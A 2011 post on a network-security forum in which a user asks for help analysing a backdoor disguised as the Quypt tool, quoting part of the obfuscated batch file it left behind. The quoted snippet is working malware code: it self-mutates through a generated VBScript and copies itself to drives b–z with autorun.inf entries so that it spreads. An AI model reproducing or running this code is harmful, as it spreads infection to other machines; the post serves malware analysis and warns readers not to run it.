Government Security
Network Security Resources

Jump to content


Quypt / Undeadnet

windows tools firewall backdoor
  • Please log in to reply
No replies to this topic

#1 AgentSmith15



  • Members
  • 130 posts

Posted 26 April 2011 - 01:14 AM

Ugh, I don't normally get caught running stupid stuff, but I was researching Quypt and supposedly it comes on Backtrack liveCD. So I did a google search and was lead to a forums (I linked below) to where they gave link to download it. Not knowing what it was I ran it and immediately noticed something off specially when I couldn't open task manager.

Anyways it looks like a backdoor, and it left a obfacted batch file in a temp directory. It does a whole bunch of policy changes, changing folder permissions, adding a user in the background, opens the firewall, shuts down windows defender and a whole bunch of AV. I haven't had time to look at the executable's but I am curious after seeing the batch file. Also a few AV's report this as a tool which grabs your SteamID.

The sites name in question is hxxp://

Also I am kinda stumped on this little snippit of the batch file it left behind. Don't run.
ECHO randomize>>ovfsbeksodog.vbs
ECHO set gpkqtmrducqqqa=createobject("scripting.filesystemobject")>>ovfsbeksodog.vbs
ECHO set mpmnebrcflqhmsflapjfkq=gpkqtmrducqqqa.opentextfile(%0,1)>>ovfsbeksodog.vbs
ECHO eiqihufrjbfanaresgjh=mpmnebrcflqhmsflapjfkq.readall>>ovfsbeksodog.vbs
ECHO qdclllivmghlvehi="ksgphdvileffsjsu knfggeiqihufrjbfanaresgjhslgeovovfsbeksodogosedme vfolkghiqdnbjg ighkrktvitdm vddghactakajbtrl apaupfutdkopvlicbhtg pgsdkllfenlp ingnldakomrotskginhh eleavvtealtjkbvdjsquduepkucqmkoo rggcrjmlfdfdoippie semipvdqepmddjocscdj tokdknsmuuablhplam mbfpubkutohgaptqhtfchd oobpnukbunmtkgakhfjefh opqtmokeiqihufrjbfanaresgjhgoq dmolkjatnrpjbbfbkckqvk rnledlakfnsapd hjfameqfcedr uekaeearsascab ahnjksmkvlvusultjkbvdjsquduepk vcradmmovjbokonvemph ppidlbhjjekoglet  nchvsrinjocpropdtmak tluqaclqmuukdgrecd nrniurtairbe frucopeltdpstkfvjdcoll ulmkistquadtsm rtofbomvsmmbnlevofmk qaoqvugtrbhqfptbsk bjemmbacgfqf ilmojrstthqpap qeurmtfgcehboismofpp qiltjkbvdjsquduepkaqcbnmid eiqihufrjbfanaresgjh qdclllivmghlvehi aslennthoeej ltjkbvdjsquduepk ckietoflidgbbg rhduriekhocshmqb gpkqtmrducqqqa mpmnebrcflqhmsflapjfkq ovfsbeksodog":aslennthoeej=split(qdclllivmghlvehi," ")>>ovfsbeksodog.vbs
ECHO for each ltjkbvdjsquduepk in aslennthoeej>>ovfsbeksodog.vbs
ECHO for ckietoflidgbbg=1 to int(rnd*6)+6>>ovfsbeksodog.vbs
ECHO rhduriekhocshmqb=rhduriekhocshmqb+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>ovfsbeksodog.vbs
ECHO next>>ovfsbeksodog.vbs
ECHO eiqihufrjbfanaresgjh=replace(eiqihufrjbfanaresgjh,ltjkbvdjsquduepk,rhduriekhocshmqb):rhduriekhocshmqb="">>ovfsbeksodog.vbs
ECHO next>>ovfsbeksodog.vbs
ECHO set mpmnebrcflqhmsflapjfkq=gpkqtmrducqqqa.opentextfile(%0,2,1)>>ovfsbeksodog.vbs
ECHO mpmnebrcflqhmsflapjfkq.writeline eiqihufrjbfanaresgjh>>ovfsbeksodog.vbs
ECHO mpmnebrcflqhmsflapjfkq.close>>ovfsbeksodog.vbs
start ovfsbeksodog.vbs

for p in (b e f g h i j k l m n o p q r s t u v w x y z) do if exist p:%0 goto Non
for i In (b e f g h i j k l m n o p q r s t u v w x y z)  do type %0 > i:
ECHO [autorun] > i:\autorun.inf
Any ideas? Did I miss a set command somewhere? The batch is included in the zip file.

I was gonna write some C++, but then I got high
I was gonna skip all that .NET stuff, but then I got high,
Now I'm stuck with non-deterministic finalization, and I know why.
Because I got high, because I got high, because I got high.

Also tagged with one or more of these keywords: windows, tools, firewall, backdoor